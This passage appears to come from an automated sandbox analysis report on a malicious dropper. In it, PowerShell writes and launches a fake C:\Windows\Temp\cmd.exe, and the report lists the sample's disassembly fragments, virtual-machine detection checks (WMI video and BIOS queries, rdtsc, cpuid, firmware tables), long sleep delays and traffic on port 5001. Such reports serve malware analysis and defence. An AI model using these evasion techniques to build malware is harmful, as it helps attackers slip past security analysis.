Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026823ED push dword ptr [esp+50h]; retn 0054h	10_2_026823F1
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026803CA push dword ptr [esp+1Ch]; retn 0020h	10_2_02680394
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268338B push bx; mov dword ptr [esp], eax	10_2_0268338D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02683380 push ebx; mov dword ptr [esp], eax	10_2_0268338D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02680068 push ecx; ret	10_2_026801DD
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268002F push dword ptr [esp+34h]; retn 0038h	10_2_02680033
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026828D2 push eax; ret	10_2_02682937
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02682962 push eax; ret	10_2_02682937
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02682971 push dword ptr [esp+2Ch]; retn 0030h	10_2_0268296E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02682949 push dword ptr [esp+2Ch]; retn 0030h	10_2_0268296E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02680129 push ecx; ret	10_2_02680296
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268292A push eax; ret	10_2_02682937
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268291F push dword ptr [esp+2Ch]; retn 0030h	10_2_0268296E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026801E3 push ecx; ret	10_2_026801DD
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026829B6 push dword ptr [esp+2Ch]; retn 0030h	10_2_0268296E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268019E push ebx; ret	10_2_026801A1
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02681E49 push dword ptr [esp+03h]; mov dword ptr [esp], ebp	10_2_02681E4D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268360A push dword ptr [esp+24h]; retn 0028h	10_2_026835AE
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026826D2 push eax; ret	10_2_02682937
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268076A push ebx; ret	10_2_0268076D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026807F2 push edx; retf	10_2_026807F3
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_026837C8 push dword ptr [esp+10h]; retn 0014h	10_2_026837C4
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02684FCA push es; ret	10_2_02684FCD
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02682789 push dword ptr [esp+04h]; retn 0008h	10_2_026827AD

Source: cmd.exe.0.dr

Static PE information: section name: .itext entropy: 7.893088081152898

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\cmd.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\cmd.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49749

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Temp\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Temp\cmd.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_02656A3C rdtsc

10_2_02656A3C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7149	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2492	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 441	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\cmd.exe TID: 5464	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Windows\Temp\cmd.exe TID: 5464	Thread sleep time: -35500s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\cmd.exe TID: 2348	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\cmd.exe TID: 5404	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Temp\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\Temp\cmd.exe

10_2_02653ECD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: cmd.exe, 0000000A.00000002.2102253733.0000000000B86000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHH
Source: cmd.exe, 0000000A.00000003.2074794526.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2055953953.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2089874877.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUa\|
Source: cmd.exe, 0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074794526.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1415178433.0000000006E32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_02656A3C rdtsc

10_2_02656A3C

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_00445250 LdrInitializeThunk,

10_2_00445250

Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02651257 mov edx, dword ptr fs:[00000030h]	10_2_02651257
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02652B0A mov edx, dword ptr fs:[00000030h]	10_2_02652B0A
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0265398E mov eax, dword ptr fs:[00000030h]	10_2_0265398E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0265664A mov edx, dword ptr fs:[00000030h]	10_2_0265664A
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02652750 mov ebx, dword ptr fs:[00000030h]	10_2_02652750
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02660D40 mov eax, dword ptr fs:[00000030h]	10_2_02660D40
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02660D2F mov eax, dword ptr fs:[00000030h]	10_2_02660D2F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"

Jump to behavior

Source: cmd.exe, 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe, 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, cmd.exe.0.dr	Binary or memory string: Shell_TrayWndS
Source: cmd.exe, 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe, 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, cmd.exe.0.dr	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_02652031 cpuid

10_2_02652031

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
